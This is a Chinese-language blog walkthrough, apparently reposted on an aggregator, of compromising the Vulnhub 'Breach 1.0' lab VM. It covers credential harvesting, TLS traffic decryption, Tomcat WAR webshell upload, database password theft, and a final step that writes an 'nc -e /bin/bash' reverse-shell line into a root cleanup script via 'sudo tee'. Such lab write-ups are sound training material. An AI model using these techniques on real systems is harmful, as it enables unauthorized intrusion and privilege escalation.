IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> Java知识库 -> Vulnhub靶场渗透-Breach1.0 -> 正文阅读

[Java知识库]Vulnhub靶场渗透-Breach1.0

Vulnhub简介

Vulnhub是一个提供各种漏洞环境的一个靶场平台,大部分环境都是虚拟机镜像文件,预先设计各种漏洞
需要使用VMware或VirtualBox 运行,每个镜像都有破解的目标,从启动虚拟机到获取系统的 root 权限和查看 flag

https://www.vulnhub.com/

Breach1.0靶机信息

breach1.0 是一个难度初级到中级的Boot2Root/CTF挑战
静态ip(192.168.110.140),配置环境到同一个网段,我用的kali (192.168.110.128)来进行渗透

下面开始

信息收集

端口简单扫一下,好家伙基本上端口都是开放的,肯定是有问题的
在这里插入图片描述
访问192.168.110.140的 80 端口进入web页面
在这里插入图片描述
谷歌翻译了一下,哈哈哈
在这里插入图片描述

漏洞挖掘

1、右键查看首页源码,注意到注释很可疑,是一段base64 编码
在这里插入图片描述
两次解码得到一串账号密码
在这里插入图片描述
2、首页图片可以点击跳转,其他几个页面都是图片啥的,最后一个是 impresscms登录页
在这里插入图片描述
在这里插入图片描述
既然是登录页,那就用之前得到的账号密码尝试登录,登录成功,注意到有三封邮件
在这里插入图片描述
邮件三发现保存一个SSL证书,访问下载一个SSL证书的密钥库keystore,keystore是储存公私钥的一种文件格式
在这里插入图片描述
3、返回到左边的功能菜单,挨个查看了一下,profile 目录也看了一下,没发现什么漏洞
在这里插入图片描述
但找到一个很可疑的SSL,想到之前拿到的SSL密钥库,就点进去看了
在这里插入图片描述
在这里插入图片描述
谷歌翻译了一下
在这里插入图片描述
得到storepassword and keypassword are all set to 'tomcat'.,提到了无法读取文件很有可能就是流量包被前面的SSL加密了
访问下载流量包,wireshark打开应该是加密了流量
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
4、成功导出 .p12 证书,然后就是把他导入到wireshark,导入证书后HTTPS被解密,查看流量包
可以看到原来的一些TLS加密的变成了HTTP
最新版wireshark已经 把SSL 改为 TLS,其实SSL/TLS 都已统称通信加密协议
在这里插入图片描述
看样子像是被挂了图片马,执行了cmd
在这里插入图片描述
追踪http流,获得Tomcat后台登录地址http://192.168.110.140:8443/_M@nag3Me/html
采用http basic 认证,包含了用户名和密码的数据包 Authorization: Basic dG9tY2F0OlR0XDVEOEYoIyEqdT1HKTRtN3pC
base64 解码得到tomcat:Tt\5D8F(#!*u=G)4m7zB

在这里插入图片描述
在这里插入图片描述
然后就是去访问Tomcat 后台登录
在这里插入图片描述
Tomcat后台的 getshell 有标准姿势,上养马场,准备好jsp版本的各种吗,像cmd小马,菜刀马,jspspy大马,打包成 .zip ,在改成 .war,上传部署
在这里插入图片描述
5、发现问题,用菜刀去连,一会儿就会断开,文件被删除,需要重新上传 war 包,猜测主机可能有杀软或者杀webshell的工具
解决方法,用bash反弹一个shell给我们
可以看我的另一篇文章
Linux反弹shell

查看当前系统用户 cat /etc/passwd ,注意到两个值的关注的用户,root就不用说了,我们关注的主要是有bin/bash权限的用户
在这里插入图片描述
进到网站根目录发现两个很长的文件名的php文件,打开看是数据库的连接文件,用户是 root 密码是空
在这里插入图片描述
登录mysql数据库,查询user表,拿到milton的密码MD5 thelaststraw在这里插入图片描述
在这里插入图片描述
提权到 milton用户
在这里插入图片描述
查看历史命令,看到su blumbergh,需要找到这个用户的密码
在这里插入图片描述
在根目录下有6张图片,用 exiftool 查看详细信息,在bill.png 下看到可疑的注释coffeestains
在这里插入图片描述
在这里插入图片描述
6、尝试登录blumbergh,提权成功,历史命令里发现有可疑文件
在这里插入图片描述
进入这个文件,这是个清理脚本,每三分钟执行清理删除webapps目录下的所有文件,所以之前的菜刀一直会断连就是被清理了
在这里插入图片描述
sudo -l查看sudo 权限,发现能够以 root权限执行 tee 和 tidyup.shtee 命令用于读取标准输入的数据,并将其内容输出成文件,tidyup.sh就是清理脚本
在这里插入图片描述
7、想法就是利用 tee 以 root的权限向清理脚本写入反弹 shell,拿到 root权限

nc反弹shell
echo "nc -e /bin/bash 192.168.110.128 4444" > shell.txt

使用 tee命令将shell.txt写到 清理脚本
cat shell.txt | sudo /usr/bin/tee /usr/share/cleanup/tidyup.sh

查看是否写入
cat /usr/share/cleanup/tidyup.sh
在这里插入图片描述
成功写入,nc监听等待反弹shell,root权限
在这里插入图片描述
查看隐藏文件,打开 flag.txt ,通关
在这里插入图片描述

总结

也是第一次写这种渗透的练习靶场,遇到了很多的坑,比如说各种环境的奇怪报错,linux操作不熟等等很多问题

通过查阅文档资料一个一个问题复现解决也学到了很多,还会继续练习记录靶场学习

道路是曲折的,回首是牛逼的

哈哈哈

  Java知识库 最新文章
计算距离春节还有多长时间
系统开发系列 之WebService(spring框架+ma
springBoot+Cache(自定义有效时间配置)
SpringBoot整合mybatis实现增删改查、分页查
spring教程
SpringBoot+Vue实现美食交流网站的设计与实
虚拟机内存结构以及虚拟机中销毁和新建对象
SpringMVC---原理
小李同学: Java如何按多个字段分组
打印票据--java
上一篇文章      下一篇文章      查看所有文章
加:2021-09-09 11:36:30  更:2021-09-09 11:37:48 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年11日历 -2024/11/23 17:05:29-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码